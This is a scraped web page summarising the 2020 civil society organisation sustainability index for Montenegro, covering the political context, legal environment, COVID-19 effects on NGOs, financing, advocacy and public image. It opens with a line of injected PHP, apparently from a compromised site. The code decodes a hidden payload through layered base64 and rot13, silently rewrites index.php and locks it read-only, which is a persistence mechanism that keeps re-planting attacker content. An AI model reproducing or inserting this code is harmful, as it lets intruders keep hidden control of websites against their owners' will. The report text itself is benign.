$i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } NVO Indeks | Index održivosti nevladinih organizacija u CG

Indeks održivosti organizacija civilnog društva u Crnoj Gori

 2020.

Indeks održivosti OCD-a je analitički instrument koji mjeri napredak civilnog sektora u regionu Centralne i Istočne Evrope i Evroazije.

››  Indeks ispituje sveukupno okruženje za razvoj civilnog društva, kroz sedam dimenzija. ‹‹

›› Uvod

 

Nakon 30 godina vladavine, Demokratska partija socijalista (DPS) nije uspjela da formira većinu na parlamentarnim izborima koji su održani 30. avgusta 2020. godine. Nova vladajuća većina je sastavljena od tri koalicije. Iako je koalicioni sporazum potpisan neposredno nakon izbora, nova Vlada je formirana tek u decembru 2020. godine. U svom ekspozeu, novi premijer je naglasio važnost partnerstava sa OCD i najavio poboljšanje ambijenta za djelovanje NVO kroz unapređenje strateškog i normativnog okvira i suštinsku promjenu učešća NVO u procesu donošenja odluka. Vlada je pretežno sastavljena po ekspertskom konceptu i postoje velika očekivanja javnosti. Činjenica da je predsjednik DPS-a istovremeno i predsjednik države može predstavljati izazov za novu vladu….

Pravno okruženje

 

Pravno okruženje za djelovanje OCD-a se nije značajno promijenilo u 2020. godini.

Osnivanje, registracija, pravno svojstvo, finansiranje i drugi aspekti djelovanja nevladinih udruženja i fondacija su uređeni Zakonom o nevladinim organizacijama (u daljem tekstu: Zakon o NVO). Zakon se ne primjenjuje na političke partije, vjerske zajednice, sindikalne organizacije, sportske organizacije, poslovna udruženja i druge fondacije ili organizacije čije je osnivač država. U 2020. godini….

Organizacioni kapaciteti

 

Organizaciono upravljanje OCD-a u toku 2020. godine je bilo izazovno usljed izbijanja pandemije COVID-19. Istraživanje koje je CRNVO sproveo u aprilu je pokazalo je da je već u tom periodu došlo do negativnih efekata poput otpuštanja, nemogućnosti realizacije aktivnosti i obustave pružanja servisa. Na primjer, preko 42% NVO istaklo da je usljed pandemije došlo do kašnjenja u realizaciji ugovora o finansiranju, 35% da nisu bili u mogućnosti da plate račune za zakup kancelarije, struju, internet i održavanje, preko 19% je moralo da otkaže plaćanje zakupa kancelarije, oko 9% da otpusti zaposlene, a 7% da smanji iznose zarada zaposlenih…

Finansijska održivost

 

Nije došlo do značajnijeg unapređenja finansijske održivosti OCD-a u 2020. godini.

Ne postoje precizni podaci o tome u kojoj je mjeri pandemija koronavirusa uticala na finansijske kapacitete civilnog sektora. Ipak, mali dio OCD-a ima sređene finansijske sisteme koji mogu da opstanu u vrijeme krize. Po ocjenama OCD-a, donatori su pokazali fleksibilnost u odnosu na potrebe odlaganja ili prilagođavanja projektnih aktivnosti novonastalim okolnostima. Donatorska zajednica je stavila značajan fokus na teme koje su povezane sa pandemijom, što može opredijeliti aktivnosti OCD-a u budućnosti. Vlada je u 2020. donijela tri paketa mjera za pomoć ekonomiji za borbu protiv posljedica krize izazvane pandemijom, međutim, njima nisu obuhvaćene OCD…

Zagovaranje

 

Zagovaranje OCD-a se nije značajno promijenilo u 2020. godini. I dalje nije obezbijeđeno suštinsko konsultovanje Vlade sa civilnim sektorom u procesu kreiranja politika i donošenja odluka. Vlasti su tokom godine bile usredsređene na pandemiju, a zbog održavanja izbora je smanjen broj donijetih propisa, dakle, javne politike su bile manje zastupljene na agendi Vlade…

Pružanje usluga

 

OCD u Crnoj Gori pružaju brojne usluge u različitim oblastima. Najčešće su to usluge u oblastima: besplatna pravna pomoć, zaštita potrošača, zaštita uzbunjivača, socijalna i dječija zaštita, zaštita i pružanje pomoć́i osobama sa invaliditetom, obrazovanje i zdravstvo….

Infrastruktura sektora

 

Infrastruktura koja podržava sektor OCD-a se nije bitno promijenila u 2020. godini.

CRNVO upravlja Resursnim centrom, koji je uspostavljen da poboljša upravljačke i tehničke kapacitete organizacija civilnog drušrtva, saradnju sa akademskom zajednicom, lokalnim i nacionalnim vlastima, kao i da poveća povjerenje i podršku građana civilnom sektoru…

Javni imidž

 

Imidž nevladinih organizacija nije se bitno promijenio u 2020. godini.

Mediji u velikoj mjeri izvještavaju o inicijativama i aktivnostima koje sprovode vodeće organizacije civilnog društva. Predstavnici OCD-a su gotovo svakodnevno prisutni u medijima i gostuju u popularnim TV emisijama koje se bave temama iz njihovog područja rada. Građani stoga uglavnom znaju ko su lideri istaknutijih OCD-a…

© 2020 Centar za demokratsku tranziciju